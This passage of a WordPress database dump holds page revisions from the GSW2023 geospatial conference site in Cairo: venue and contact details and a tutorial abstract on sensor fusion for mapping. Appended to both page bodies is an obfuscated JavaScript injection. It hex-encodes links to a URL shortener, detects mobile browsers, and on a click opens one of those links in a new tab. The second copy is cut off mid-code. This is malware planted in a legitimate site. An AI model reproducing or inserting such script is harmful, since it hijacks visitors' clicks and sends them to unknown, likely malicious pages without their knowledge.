!important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 17:09:46','2023-08-15 17:09:46','',3066,'https://gsw2023.com/?p=5207',0,'revision','',0),
(5208,1,'2023-08-15 22:38:06','2023-08-15 22:38:06','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"4011\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5><strong><span style=\"font-size: 10pt;\">Instructor</span></strong></h5>\n<h6><strong><span style=\"font-size: 10pt;\">Speaker: Dr. Mohamed M.R. Mostafa</span></strong></h6>\n<h6><strong><span style=\"font-size: 10pt;\">Duration: 1.5 hours</span></strong></h6>\n<h6><strong><span style=\"font-size: 10pt;\">Location: ISPRS GSW 2023 – Cairo</span></strong></h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"107\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span></p>\n<p style=\"text-align: justify;\">Dr. Mohamed M.R. Mostafa is the Lead Technical Authority, Mobile Mapping at Trimble Applanix. Dr.<br />\nMostafa obtained his Ph.D. in geomatics engineering from The University of Calgary, Canada in 1999. He<br />\nhas 24 years of experience in system design, development, integration, calibration, and quality control<br />\nfor airborne, land, and indoor surveying and autonomy applications. He has managed and delivered<br />\nprojects in the United States, Canada, Europe, Africa, and the Middle East and has contributed to more<br />\nthan 250 technical publications, including the Manual of Photogrammetry 5th edition and the DEM User<br />\nManual. He served at the ISPRS, ASPRS, and FIG in different capacities in the last 25 years. He received<br />\n11 international awards in the last 30 years.</p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h1 class=\"fancy-title entry-title start-animation-done start-animation\">Sensor Fusion for Mapping and Navigation</h1>\n<h5><span style=\"text-align: justify;\"><strong>Tutorial Topic</strong></span></h5>\n<h5><strong>Abstract:</strong></h5>\n<p style=\"text-align: justify;\"><strong>Integrated Sensors enable both Surveying and Autonomy technologies. Self-driving vehicles R&amp;amp;D has been evolving over the past decade. Self-driving depends on several integrated technologies including high-definition mapping &amp;amp; map-based localization. The art and science of mapping along with national and international standards and specifications have resulted in adequate quality mapping products especially in the civilized part of the world for construction, infrastructure, and transportation networks but not satisfactory enough for more critical precision needed for autonomous driving. The developing part of the world lacks the existence of many mapping products let alone high-definition maps.<br />\nTherefore, on one hand, the lack of high-definition maps might be an obstacle for self-driving vehicle development.<br />\nOn the other hand, sensor technology has significantly evolved in the past few decades. Including:<br />\n. Multi-head cameras using oblique/nadir components<br />\n. Outstanding LiDAR systems and radar sensors<br />\n. The evolution of GPS into GNSS that integrated satellite positioning systems from around the globe<br />\n. The evolution of inertial sensor technology due to their successful use in the automotive industry to trigger airbags and even their implementation in cellular phones that led to smaller,lighter weight, higher accuracy, and more economical Inertial measuring units IMU’s.<br />\nReaping the benefits of these evolving technologies to address the high-definition mapping challenges is </strong><strong>the main scope of this proposed session. Designed to be informative, educational, and interactive, the workshop is designed to address the following Audience categories </p>\n<p>. Decision Makers<br />\n<strong>. Technicians, Technologists, and Engineers</strong><br />\n<strong>. Students</strong><br />\n<strong>The workshop will start by addressing the ‘here and now’ technological challenges and their associated </strong><strong>solutions as well as the future technological development plans to address that. First, the technological </strong><strong>evolution of film into digital cameras, GPS into GNSS, laser profilers into LiDAR systems, INS into IMU,</strong><strong>etc. will be addressed including the algorithmic evolution of aerotriangulation, SLAM, direct </strong><strong>georeferencing (DG) and integrated sensor orientation (ISO). The benefits of integrating all the </strong><strong>aforementioned technologies in the form of simultaneous adjustment and mapping (SAM). Then, it will </strong><strong>address the integration mechanisms of imaging, LiDAR, radar, inertial and GNSS into not only </strong><strong>georeferencing an image or LiDAR range but to also leveraging the precise LiDAR ranges and image </strong><strong>pixels to improve the precision of the trajectory in post-processing and real time modes.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 